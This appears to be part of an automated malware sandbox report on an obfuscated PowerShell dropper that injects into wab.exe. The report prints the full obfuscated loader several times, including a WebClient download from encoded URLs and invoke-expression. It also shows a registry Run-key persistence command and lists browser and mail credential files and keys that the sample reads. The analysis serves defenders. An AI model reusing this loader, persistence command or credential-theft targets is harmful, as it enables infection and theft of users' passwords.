($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
              Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.drBinary or memory string: [2024/07/01 10:19:54 Program Manager]
              Source: wab.exe, 0000000A.00000003.1988708190.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1987753034.00000000005D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)
              Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerlesj
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 54 Program Manager]
              Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerlesR
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.drBinary or memory string: [2024/07/01 10:20:03 Program Manager]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22933 cpuid 10_2_22B22933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_22B22264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,21_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041739B GetVersionExW,19_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword21_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword21_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword21_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1792, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
              MITRE ATT&CK Matrix (one column per tactic; numbers in square brackets are the hit counts shown next to a technique in the report, techniques without a number were not observed)

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Scripting [321] | Valid Accounts | Windows Management Instrumentation [11] | Scripting [321] | DLL Side-Loading [1] | Deobfuscate/Decode Files or Information [11] | OS Credential Dumping [1] | System Time Discovery [1] | Remote Services | Archive Collected Data [1] | Ingress Tool Transfer [1] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
